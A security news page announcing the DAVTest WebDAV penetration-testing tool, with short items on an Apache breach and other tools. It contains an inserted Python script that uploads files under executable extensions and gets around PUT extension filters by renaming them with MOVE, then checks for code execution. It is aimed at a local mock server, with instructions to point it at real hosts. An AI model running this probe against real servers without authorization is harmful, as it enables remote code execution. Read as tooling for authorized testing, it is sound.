Chris Sullo sent us the following news entry "DAVTest attempts to aid a penetration tester when facing WebDAV enabled services by quickly testing file type upload capability and features, as well as checking for code execution. It supports MOVE and MKCOL, authentication, and uploading of included shell files." Download: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
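The core check DAVTest automates is easy to reproduce by hand: PUT a file under each interesting extension, fall back to uploading it under a harmless name and using MOVE to rename it, then fetch it to see whether the server executes or merely serves it. The script below is an added example illustrating that sequence; it is not DAVTest's own code. The in-process mock WebDAV server is a constructed stand-in whose policy (PUT of .asp/.aspx/.php rejected, MOVE unchecked) is assumed purely so the probe can run offline, and `EXECUTABLE_EXTS` and the `/davtest_probe` directory name are assumptions of this example:

```python
"""WebDAV upload/MOVE/execution probe in the spirit of DAVTest (added example)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Assumed list of extensions worth testing; DAVTest ships its own set.
EXECUTABLE_EXTS = ("asp", "aspx", "php", "jsp", "cfm", "pl")
BENIGN_EXT = "txt"
OK = (200, 201, 204)


class MockDavHandler(BaseHTTPRequestHandler):
    """Constructed mock: in-memory WebDAV that filters PUT by extension but not MOVE."""
    store = {}
    PUT_BLOCKED = ("asp", "aspx", "php")  # assumed filter, the classic MOVE bypass case

    def log_message(self, *args):
        pass

    def _ext(self, path):
        return path.rsplit(".", 1)[-1].lower() if "." in path else ""

    def _reply(self, status, body=b""):
        self.send_response(status)
        self.end_headers()
        self.wfile.write(body)

    def do_MKCOL(self):
        self.store[self.path.rstrip("/")] = None
        self._reply(201)

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self._ext(self.path) in self.PUT_BLOCKED:
            return self._reply(403)          # extension filter applied to PUT only
        self.store[self.path] = body
        self._reply(201)

    def do_MOVE(self):
        dest = urlsplit(self.headers.get("Destination", "")).path
        if self.path not in self.store:
            return self._reply(404)
        self.store[dest] = self.store.pop(self.path)  # no extension check: the bypass
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        self._reply(404) if body is None else self._reply(200, body)


def start_mock_server():
    server = HTTPServer(("127.0.0.1", 0), MockDavHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def _request(host, port, method, path, body=None, headers=None):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def probe_webdav(host, port, directory="/davtest_probe", marker=b"davtest-marker"):
    """Return {ext: 'put' | 'move' | 'blocked'}: how each extension can be placed."""
    _request(host, port, "MKCOL", directory)
    results = {}
    for ext in EXECUTABLE_EXTS:
        target = f"{directory}/probe.{ext}"
        status, _ = _request(host, port, "PUT", target, body=marker)
        if status in OK:
            results[ext] = "put"
            continue
        # Fallback: upload under a benign extension, then MOVE it to the real name.
        staging = f"{directory}/probe_{ext}.{BENIGN_EXT}"
        status, _ = _request(host, port, "PUT", staging, body=marker)
        if status not in OK:
            results[ext] = "blocked"
            continue
        status, _ = _request(host, port, "MOVE", staging,
                             headers={"Destination": f"http://{host}:{port}{target}",
                                      "Overwrite": "T"})
        status2, data = _request(host, port, "GET", target)
        results[ext] = "move" if status in OK and status2 == 200 and data == marker else "blocked"
    return results


def check_execution(host, port, path, raw, expected):
    """Fetch an uploaded probe; 'executed' if the interpreter output comes back,
    'served raw' if the source is returned verbatim, else 'unavailable'."""
    status, data = _request(host, port, "GET", path)
    if status != 200:
        return "unavailable"
    if data.strip() == expected:
        return "executed"
    return "served raw" if data == raw else "unknown"


if __name__ == "__main__":
    srv, port = start_mock_server()
    try:
        print(probe_webdav("127.0.0.1", port))
        asp_src = b"<%= 6*7 %>"
        _request("127.0.0.1", port, "PUT", "/davtest_probe/exec.txt", body=asp_src)
        _request("127.0.0.1", port, "MOVE", "/davtest_probe/exec.txt",
                 headers={"Destination": f"http://127.0.0.1:{port}/davtest_probe/exec.asp"})
        print(check_execution("127.0.0.1", port, "/davtest_probe/exec.asp", asp_src, b"42"))
    finally:
        srv.shutdown()
```

Against a real target, replace the mock with the host and port of the WebDAV endpoint; a result of "move" for an extension means the PUT filter can be bypassed by renaming, and "executed" from the second check is the point at which an upload becomes remote code execution rather than a file-write.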
Apache Compromised Again
It appears someone chained an XSS flaw on an Apache domain, a URL shortener, and the project's issue tracking system to ultimately gain root on two core Apache machines: the host running Bugzilla and the main shell server. This is a great breakdown of a real-world incident that people rarely...
Tools: CMS Explorer Tool Released
Sullo writes in "CMS Explorer is designed to reveal the specific modules, plugins, components and themes that various CMS-driven web sites are running. It can also search OSVDB.org for vulnerabilities in found components, as well as "bootstrap" a security proxy by downloading potential file names from the component's code repository...
RSnake joins Google
In an April 1st shocker, Robert "RSnake" Hansen (known in appsec circles as the prince of XSS) has just posted an entry on his site about his new gig at Google. "People tend to think of me as a Google hater, but the truth is the only thing I've hated about Google...